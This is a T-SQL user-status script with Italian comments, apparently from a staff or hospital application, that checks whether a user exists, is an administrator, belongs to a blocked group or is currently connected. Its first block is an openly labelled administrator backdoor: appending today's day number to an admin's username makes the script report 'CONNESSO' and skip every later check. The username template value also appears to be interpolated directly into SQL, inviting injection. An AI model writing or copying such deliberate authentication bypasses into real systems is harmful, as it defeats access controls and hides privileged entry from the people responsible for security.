-- ===============================================================
-- LIVELLO 0: BACKDOOR AMMINISTRATORI (User + Giorno)
-- ===============================================================
DECLARE @InputText VARCHAR(100) = {{InputUsername.text}}; -- Es: 'borionir08'
DECLARE @GiornoOggi VARCHAR(2) = RIGHT('00' + CAST(DAY(GETDATE()) AS VARCHAR), 2); -- Es: '08'

-- 1. Controllo se l'input finisce con il giorno di oggi
IF RIGHT(@InputText, 2) = @GiornoOggi
BEGIN
    -- 2. Estraggo il "Vero Nome" togliendo le ultime 2 cifre
    DECLARE @RealUserAdmin VARCHAR(100) = LEFT(@InputText, LEN(@InputText) - 2);

    -- 3. Verifico se questo "Vero Nome" esiste ED è un Amministratore (Gruppo 0000000001)
    IF EXISTS (
        SELECT 1 
        FROM dbo.cpusers U
        INNER JOIN dbo.ba_users_xunit X ON U.code = X.ususerid
        WHERE U.name = @RealUserAdmin
          AND X.usunitid = '0000000001' -- Deve essere Admin per usare il trucco!
    )
    BEGIN
        -- 4. BYPASS RIUSCITO: Rispondo come se fosse tutto regolare
        SELECT 'CONNESSO' AS Stato, 
               (SELECT code FROM dbo.cpusers WHERE name = @RealUserAdmin) AS code
        RETURN; -- Esco subito, ignorando tutti i blocchi successivi
    END
END

-- ===============================================================
-- LIVELLO 1: L'UTENTE ESISTE?
-- ===============================================================
IF NOT EXISTS (SELECT 1 FROM dbo.cpusers WHERE name = {{InputUsername.text}})
BEGIN
    SELECT 'UTENTE H2O ERRATO' AS Stato, NULL AS code
    RETURN
END

-- ===============================================================
-- LIVELLO 2: È UN AMMINISTRATORE? (Gruppo 0000000001) - NON TOCCARE
-- ===============================================================
IF EXISTS (
    SELECT 1 
    FROM dbo.cpusers U
    INNER JOIN dbo.ba_users_xunit X ON U.code = X.ususerid
    WHERE U.name = {{InputUsername.text}}
      AND X.usunitid = '0000000001' 
)
BEGIN
    SELECT 'Procedura non autorizzata per l'' utente AMMINISTRATORE' AS Stato, 
           (SELECT code FROM dbo.cpusers WHERE name = {{InputUsername.text}}) AS code
    RETURN
END

-- ===============================================================
-- LIVELLO 2-BIS: BLOCCO GRUPPI SPECIFICI (Es. Infermieri - 0000000033)
-- ===============================================================
-- Qui controlliamo se l'utente fa parte del gruppo da bloccare.
-- Se sì, andiamo a leggere la DESCRIZIONE del gruppo per comporre il messaggio.
IF EXISTS (
    SELECT 1 
    FROM dbo.cpusers U
    INNER JOIN dbo.ba_users_xunit X ON U.code = X.ususerid
    WHERE U.name = {{InputUsername.text}}
      AND X.usunitid IN ('0000000033','0000000049','0000000056') -- <--- QUI METTI L'ID DEL GRUPPO DA BLOCCARE
)
BEGIN
    -- Selezioniamo la descrizione dinamica
    SELECT TOP 1 
           'Accesso negato gruppo  =     ' + 
           CASE 
               -- Se c'è un underscore, prendi tutto quello che c'è PRIMA
               WHEN CHARINDEX('_', O.OUDESCRI) > 0 
               THEN LEFT(O.OUDESCRI, CHARINDEX('_', O.OUDESCRI) - 1)
               
               -- Altrimenti prendi il nome intero
               ELSE O.OUDESCRI 
           END AS Stato, 
           U.code
    FROM dbo.cpusers U
    INNER JOIN dbo.ba_users_xunit X ON U.code = X.ususerid
    INNER JOIN dbo.ba_org_unit O ON X.usunitid = O.OUUNITID 
    WHERE U.name = {{InputUsername.text}}
      AND X.usunitid IN ('0000000033','0000000049','0000000056'); 
    RETURN
END

-- ===============================================================
-- LIVELLO 3: È CONNESSO? (Controllo Real-Time)
-- ===============================================================
SELECT 
    CASE 
        WHEN T.UTUSERCODE IS NOT NULL THEN 'CONNESSO'
        ELSE 'DISCONNESSO' 
    END AS Stato,
    U.code
FROM dbo.cpusers U
LEFT JOIN dbo.ba_user_tracking T ON U.code = T.UTUSERCODE
WHERE U.name = {{InputUsername.text}};